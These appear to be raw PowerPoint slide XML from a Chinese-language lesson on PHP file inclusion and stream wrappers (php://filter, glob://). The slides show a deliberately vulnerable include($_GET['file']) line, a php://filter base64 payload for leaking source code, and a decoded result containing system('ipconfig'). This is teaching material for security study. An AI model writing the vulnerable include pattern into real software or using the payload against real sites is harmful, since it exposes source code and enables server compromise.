              <a:rPr lang="zh-CN" altLang="mr-IN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>($_GET["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/test/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>index.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>://filter/read=convert.base64-encode/resource=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>result: PD9waHAgc3lzdGVtKCdpcGNvbmZpZycpOz8+   (base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>解密就可以看到内容，这里如果不进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>base64_encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，则被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>进来的代码就会被执行，导致看不到源代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>向磁盘写入文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>这会通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rot13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>过滤器筛选出字符 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"Hello World"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　然后写入当前目录下的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>example.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>file_put_contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>://filter/write=string.rot13/resource=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>example.txt","Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> World");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>这个参数采用一个或以管道符 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>分隔的多个过滤器名称</a:t>
            </a:r>
          </a:p>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60</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1205508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61</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="840601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1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1) glob://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>伪协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>glob:// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>查找匹配的文件路径模式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="mr-IN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="mr-IN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>循环 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>spl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="mr-IN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>目录里所有 *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="mr-IN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>并打印文件名和文件尺寸</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
